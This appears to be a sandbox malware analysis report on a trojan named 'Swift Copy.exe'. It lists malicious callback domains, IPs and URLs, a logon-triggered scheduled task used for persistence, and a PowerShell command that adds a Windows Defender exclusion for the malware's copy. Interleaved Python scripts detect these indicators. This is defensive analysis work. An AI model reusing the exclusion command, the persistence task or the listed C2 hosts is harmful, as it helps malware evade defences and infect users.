          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          www.epic45.co.uk | 103.67.235.120 | true | true | | unknown
          www.posinet1.com | 202.172.26.50 | true | false | | unknown
          kinemartigues.com | 51.159.175.169 | true | true | | unknown
          www.expectedclosure.one | 192.3.130.2 | true | true | | unknown
          mogdento.com | 103.92.235.55 | true | true | | unknown
          natroredirect.natrocdn.com | 85.159.66.93 | true | true | | unknown
          www.mogdento.com | unknown | unknown | true | | unknown
          www.kinemartigues.com | unknown | unknown | true | | unknown
          www.blackyaga.xyz | unknown | unknown | true | | unknown
          Name | Malicious | Antivirus Detection | Reputation
          http://www.epic45.co.uk/bwe0/?9rV8zl=21tjbkChbFWznsu0s5dQgMCLDQHTp3tJL/2kMDFZYsfdSZfl+tTwQu/FIpmHzzlEQrwumqO36HFfwo3EfD1Crt0mHKlMwrNEfw==&YN9=w6PTp6pp-Zfte2a0 | true | Avira URL Cloud: malware | unknown
          http://www.kinemartigues.com/bwe0/ | true | Avira URL Cloud: malware | unknown
          http://www.epic45.co.uk/bwe0/ | true | Avira URL Cloud: malware | unknown
          www.my1245.com/bwe0/ | true | Avira URL Cloud: malware | low
          http://www.mogdento.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9+phILUgzUwHPh2LCdIS8sbnczPqTtIgth+oM8i1bVTrz46wPYQwCayAKWOCT9dODOCAwfo9QBDVHWgp/MlMRCDLLRs2he6w== | true | Avira URL Cloud: malware | unknown
          http://www.kinemartigues.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB+LrmWtJBQqMyCe4o1I9YkrzlNkt4Y5lQSVrtsHmDN4rDqK6jdbIqfImlF05yj9AnCTnfqfBJ/tqveG/rYA7nf00SA== | true | Avira URL Cloud: malware | unknown
          http://www.mogdento.com/bwe0/ | true | Avira URL Cloud: malware | unknown
          http://www.blackyaga.xyz/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=sE+e17jc53oiMc/tXTBrdM81Jmo39pRVgGsWsNeg2yHBZP8DMvAafxUSa5mU59eBVMhEqwjNcWZP/MmjQeTg8VWUgAq2ah5qoA== | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.fontbureau.com | Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.fontbureau.com/designersG | Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://philiphanson.org/medius/book/1.0 | Swift Copy.exe, ImUIYlbLTIh.exe.0.dr | false | Avira URL Cloud: safe | unknown
http://schemas.micr$ | explorer.exe, 0000000B.00000000.339382801.00000000061ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.323818744.00000000061ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.389826737.00000000061ED000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://www.fontbureau.com/designers/? | Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.founder.com.cn/cn/bThe | Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.kinemartigues.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&amp;9rV8zl=M79ygOKZB | NETSTAT.EXE, 00000019.00000002.518409409.000000000379E000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiro.com | Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.goodfont.co.kr | Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://mogdento.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=eF9 | NETSTAT.EXE, 00000019.00000002.518477134.0000000003996000.00000004.10000000.00040000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://www.carterandcone.coml | Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.founder.com.cn/cn/cThe | Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.jiyu-kobo.co.jp/ | Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.kinemartigues.com/bwe0/?YN9=w6PTp6pp-Zfte2a0&9rV8zl=M79ygOKZB | NETSTAT.EXE, 00000019.00000002.518409409.000000000379E000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.galapagosdesign.com/DPlease | Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.fonts.com | Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.sandoll.co.kr | Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Swift Copy.exe, 00000000.00000002.286746529.0000000002670000.00000004.00000800.00020000.00000000.sdmp, Swift Copy.exe, 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.sakkal.com | Swift Copy.exe, 00000000.00000002.291592246.0000000006542000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | ASN Country | Malicious
103.92.235.55 | mogdento.com | India | 138251 | ZINIOSS-AS-IN Zinios Information Technology Pvt Ltd | IN | true
103.67.235.120 | www.epic45.co.uk | Philippines | 38719 | DREAMSCAPE-AS-AP Dreamscape Networks Limited | AU | true
192.3.130.2 | www.expectedclosure.one | United States | 36352 | AS-COLOCROSSING | US | true
85.159.66.93 | natroredirect.natrocdn.com | Turkey | 34619 | CIZGI | TR | true
51.159.175.169 | kinemartigues.com | France | 12876 | Online SAS | FR | true
                                                Joe Sandbox Version:35.0.0 Citrine
                                                Analysis ID:682145
                                                Start date and time:2022-08-11 06:27:06 +02:00
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 8m 52s
                                                Hypervisor based Inspection enabled:false
                                                Report type:light
                                                Sample file name:Swift Copy.exe
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:34
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:1
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winEXE@11/9@6/5
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HDC Information:
                                                • Successful, ratio: 89.5% (good quality ratio 78.3%)
                                                • Quality average: 72%
                                                • Quality standard deviation: 33.1%
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 0
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                • TCP Packets have been reduced to 100
                                                • Excluded IPs from analysis (whitelisted): 23.211.6.115, 23.211.4.86
                                                • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
• Not all processes were analyzed, report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
06:28:14 | API Interceptor | 1x Sleep call for process: Swift Copy.exe modified
06:28:22 | API Interceptor | 44x Sleep call for process: powershell.exe modified
                                                No context
                                                Process:C:\Users\user\Desktop\Swift Copy.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:modified
                                                Size (bytes):1308
                                                Entropy (8bit):5.345811588615766
                                                Encrypted:false
                                                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
                                                MD5:2E016B886BDB8389D2DD0867BE55F87B
                                                SHA1:25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
                                                SHA-256:1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
                                                SHA-512:C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
                                                Malicious:true
                                                Reputation:high, very likely benign file
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):22240
                                                Entropy (8bit):5.6028719789255295
                                                Encrypted:false
                                                SSDEEP:384:BjtCDLq0wase0vaYS0nkjultIti7Y9gNSJ3xS1BMrmLZ1AV7t/JQ64I+iaY:BOeTTkCltS2NcRa4uo
                                                MD5:7A7867EA62542FC6B21D374EB056D454
                                                SHA1:C5683AEABF7D5E9DFD8DCA8FCD2EBBFC07F5E935
                                                SHA-256:620940C797B65CD49D883B943193907DA9E16C40473F957D80137136442155A5
                                                SHA-512:2EB8C8BA5F3609F1F9BBD690664000C21519B33098150E55BD15F47A50503F96F8C2F13481F271D29F94D36667E2AAFDADB27B774FFE9FF33897053BEE1AD4FE
                                                Malicious:false
                                                Preview:@...e...........p...................A.X..............@..........H...............<@.^.L."My...:P..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                Process:C:\Windows\SysWOW64\NETSTAT.EXE
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                Category:dropped
                                                Size (bytes):40960
                                                Entropy (8bit):0.792852251086831
                                                Encrypted:false
                                                SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                Malicious:false
                                                Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Preview:1
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:very short file (no magic)
                                                Category:dropped
                                                Size (bytes):1
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:3:U:U
                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                Malicious:false
                                                Preview:1
                                                Process:C:\Users\user\Desktop\Swift Copy.exe
                                                File Type:XML 1.0 document, ASCII text
                                                Category:dropped
                                                Size (bytes):1598
                                                Entropy (8bit):5.150122293480084
                                                Encrypted:false
                                                SSDEEP:24:2di4+S2qh/Q1K1y1mokUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtcxvn:cge4MYrFdOFzOzN33ODOiDdKrsuTcv
                                                MD5:7ADFF2CBF1E01AF88D3EED7E905CCA35
                                                SHA1:39CA78F7F44C9777C94C7EE8C0C3DE2439E38E49
                                                SHA-256:7E1B747AB5522CC5F787C2C0D1CDFD309A83F2172C57E3C71CFC7DACE57D9B22
                                                SHA-512:7BA1CD52047EB744B81F34089B8FE44B74F8416ADD6F32F89A5F4677C4FCFE1CD8D1547DC6A2E235FAE6C09E37A875C3CB10D3CB1703340F42EF1CD3520C012C
                                                Malicious:true
                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>computer\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>computer\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>computer\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <
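This dropped file is the persistence mechanism: a Task Scheduler definition with an enabled LogonTrigger for the current user, running at LeastPrivilege so it needs no elevation, and with a RegistrationInfo date of 2014 although the analysis ran in 2022, which points to a template carried inside the dropper rather than a task the user registered. The Python below is an added example (not part of the report or of Joe Sandbox) that parses such a task XML and reports those indicators. The sample document is constructed from the preview above; because the preview is cut off before the Actions element, the Exec command in the sample is a placeholder path and not something recovered from the report. The file declares encoding="UTF-16" while the report identifies it as ASCII text, so the declaration is dropped before parsing.

```python
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Locations a standard user can write to; a task launching from here deserves attention.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")

# Constructed sample modelled on the dropped task XML above. The <Actions> block is
# invented (placeholder.exe); the report preview ends before it.
SAMPLE_TASK_XML = r"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2014-10-25T14:27:44.8929027</Date>
    <Author>computer\user</Author>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
      <UserId>computer\user</UserId>
    </LogonTrigger>
    <RegistrationTrigger>
      <Enabled>false</Enabled>
    </RegistrationTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>computer\user</UserId>
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
    <AllowHardTerminate>false</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Users\user\AppData\Roaming\placeholder.exe</Command>
    </Exec>
  </Actions>
</Task>
"""


def analyse_task_xml(text: str, analysis_year: int = 2022) -> dict:
    """Extract persistence indicators from a Task Scheduler XML document."""
    # The declaration claims UTF-16 but the file is ASCII on disk; strip it so the
    # parser works from the bytes it actually has.
    body = re.sub(r"^\s*<\?xml[^>]*\?>", "", text).strip()
    root = ET.fromstring(body)
    findings = []

    for trig in root.findall("t:Triggers/t:LogonTrigger", TASK_NS):
        enabled = (trig.findtext("t:Enabled", "true", TASK_NS) or "true").lower()
        if enabled == "true":
            user = trig.findtext("t:UserId", "<any user>", TASK_NS)
            findings.append(f"logon trigger enabled for {user}")

    commands = [c.text or "" for c in root.findall("t:Actions/t:Exec/t:Command", TASK_NS)]
    for cmd in commands:
        if any(marker in cmd.lower() for marker in USER_WRITABLE):
            findings.append(f"action runs from a user-writable path: {cmd}")

    date = root.findtext("t:RegistrationInfo/t:Date", "", TASK_NS) or ""
    year = int(date[:4]) if date[:4].isdigit() else None
    if year is not None and year < analysis_year - 1:
        findings.append(f"registration date {date[:10]} predates the analysis run "
                        f"by {analysis_year - year} years (templated task XML?)")

    return {
        "registration_date": date,
        "run_level": root.findtext("t:Principals/t:Principal/t:RunLevel", "", TASK_NS),
        "commands": commands,
        "findings": findings,
    }


if __name__ == "__main__":
    for line in analyse_task_xml(SAMPLE_TASK_XML)["findings"]:
        print(line)
```

On a live host the same checks apply to the XML files under C:\Windows\System32\Tasks, where registered tasks are stored.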
                                                Process:C:\Users\user\Desktop\Swift Copy.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):951808
                                                Entropy (8bit):7.296393499688903
                                                Encrypted:false
                                                SSDEEP:12288:V5RNKS2+vpc++24ATV3l7DnJE8Y9FFyUaOzNsC7qZJSPlestx70M2TgN/0seI+r:z1jpSwTFJq79FFyrW6Cs+tJegiDr
                                                MD5:50D4FB3F5A33007C2F80E5BBAA5E0CCD
                                                SHA1:26FF500D90184B5E7928CB16E92BBE0E4553E95E
                                                SHA-256:0BACCE1F09D476C0B84CD699B50152A74DD6BFD2A052749D7B5A3F4A4AE7B7D9
                                                SHA-512:D6E46C5187CE7AD3021E22937AB20207672BDBD936473A56C78FBA26BDC20ADA47B3F1C21B6058A4941965A60FE37A18CBEF95A19BA9A216F4FE726F1929F7EF
Malicious:true (MD5, SHA1 and SHA-256 are identical to the submitted sample Swift Copy.exe listed below; this dropped file is a copy of the sample itself)
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 20%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.b.................r..........n.... ........@.. ....................................@.....................................W.................................................................................... ............... ..H............text...tp... ...r.................. ..`.rsrc................t..............@..@.reloc..............................@..B................P.......H....... ...................:..........................................z.(".....}.....(#...o$...}....*..0...........{............3.....(.....*..................0...........{......,....f.........}......}......}.......s....o....}.......}....8......{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X .;.|.{....Xa}......}.....{....o....:q....(....+..(........}.........(......*................n..}.....{....,..{....o....*..{....*.s%.
                                                Process:C:\Users\user\Desktop\Swift Copy.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):26
                                                Entropy (8bit):3.95006375643621
                                                Encrypted:false
                                                SSDEEP:3:ggPYV:rPYV
                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                Malicious:false
                                                Preview:[ZoneTransfer]....ZoneId=0
                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):5793
                                                Entropy (8bit):5.414413496960812
                                                Encrypted:false
                                                SSDEEP:96:BZ6h4NbqDo1ZQZrh4NbqDo1Z7/ExEHEjZMh4NbqDo1Z4cEXEXEvbZti:rYEiWWD
                                                MD5:D946F9E80DA250A03428805266BA205D
                                                SHA1:E3E581F2D54CA949141B2F6B4632B40D659229A4
                                                SHA-256:2FE88921A87252CCC07C1A2C128417E75CFC5D412E15D82F759ABDDB00E46F65
                                                SHA-512:719B1FD781969903B541452DA310AE4B3C716F35838DF31AA38CA95A259A5F57877A1C2B190704518376D120AEC2B868DB340177672BF82330F2D116C5580043
                                                Malicious:false
                                                Preview:.**********************..Windows PowerShell transcript start..Start time: 20220811062822..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 562258 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe..Process ID: 2300..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220811062822..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe..**********************..Windows PowerShell transcript start..Start time: 20220811063226..Username: computer\user..RunAs User: computer\ha
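The transcript records the defence-evasion step: the sample launched powershell.exe with Add-MpPreference -ExclusionPath pointing at its own copy under AppData\Roaming, so Windows Defender skips that file. The Python below is an added example (not part of the report or of Joe Sandbox) that scans a PowerShell transcript for commands that add Defender exclusions and pulls the header fields needed to tie the transcript to the process tree (Process ID 2300 here). The sample transcript is constructed from the preview above, with the dots of the preview restored to line breaks; the set of exclusion parameters matched is an assumption that covers the documented -ExclusionPath, -ExclusionProcess and -ExclusionExtension parameters.

```python
import re

# Constructed excerpt modelled on the dropped transcript in the report.
SAMPLE_TRANSCRIPT = r"""**********************
Windows PowerShell transcript start
Start time: 20220811062822
Username: computer\user
RunAs User: computer\user
Configuration Name: 
Machine: 562258 (Microsoft Windows NT 10.0.17134.0)
Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe
Process ID: 2300
PSVersion: 5.1.17134.1
PSEdition: Desktop
**********************
**********************
Command start time: 20220811062822
**********************
PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe
**********************
"""

# Cmdlets that change Defender preferences, with everything after them captured.
MP_PREF_RE = re.compile(r"\b(?P<cmdlet>Add-MpPreference|Set-MpPreference)\b(?P<args>.*)$",
                        re.IGNORECASE)
# Exclusion parameters and their value (quoted or a single unquoted token).
EXCL_PARAM_RE = re.compile(
    r"""-(?P<param>Exclusion(?:Path|Process|Extension))\s+(?P<value>"[^"]*"|'[^']*'|\S+)""",
    re.IGNORECASE)
HEADER_KEYS = ("Start time", "Username", "RunAs User", "Machine",
               "Host Application", "Process ID", "PSVersion")


def find_defender_exclusions(transcript: str) -> list:
    """Return (line_no, cmdlet, parameter, value) for every exclusion-adding command."""
    hits = []
    for no, line in enumerate(transcript.splitlines(), 1):
        m = MP_PREF_RE.search(line)
        if not m:
            continue
        for p in EXCL_PARAM_RE.finditer(m["args"]):
            hits.append((no, m["cmdlet"], p["param"], p["value"].strip("'\"")))
    return hits


def transcript_header(transcript: str) -> dict:
    """First value of each header field, for correlating with the process tree."""
    info = {}
    for line in transcript.splitlines():
        key, sep, value = line.partition(":")
        key = key.strip()
        if sep and key in HEADER_KEYS and key not in info:
            info[key] = value.strip()
    return info


if __name__ == "__main__":
    hdr = transcript_header(SAMPLE_TRANSCRIPT)
    print("process", hdr.get("Process ID"), "started", hdr.get("Start time"))
    for no, cmdlet, param, value in find_defender_exclusions(SAMPLE_TRANSCRIPT):
        print(f"line {no}: {cmdlet} -{param} {value}")
```

The same command appears twice in the sample (once in the Host Application line, once as the executed command), so the function reports two hits; deduplicate on the value when producing IOCs. PowerShell also accepts unambiguous parameter prefixes such as -ExclusionP, and Set-MpPreference can be invoked with a hashtable of settings, so transcript matching is a complement to, not a replacement for, the Defender operational log, which records preference changes as event ID 5007.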
                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):7.296393499688903
                                                TrID:
